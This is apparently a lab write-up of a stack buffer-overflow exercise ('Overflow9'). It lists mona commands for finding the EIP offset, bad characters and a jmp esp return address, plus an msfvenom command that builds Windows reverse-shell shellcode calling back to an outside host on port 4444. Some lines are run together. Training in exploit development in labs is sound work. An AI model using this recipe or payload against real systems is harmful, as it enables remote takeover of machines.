Overflow9
1. Fuzz application to find number of bytes needed to crash the application
Bytes needed to crash application: 1600
2. Set mona configuration
!mona config -set workingfolder c:\mona\%p
3. Find EIP offset
EIP offset/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1600
!mona findmsp -distance 1600
EIP offset: 1514
4. Find bad characters
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Bad characters: \x00\x04\x3e\x3f\xe1
5. Find jmp esp instruction sets without any bad characters
jmp esp instruction sets without any bad characters!mona jmp -r esp -cpb "\x00\x04\x3e\x3f\xe1"
Return address: 0x625011af
6. Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x04\x3e\x3f\xe1" -f c
7. Set nop sled in padding
nop sled in paddingLast updated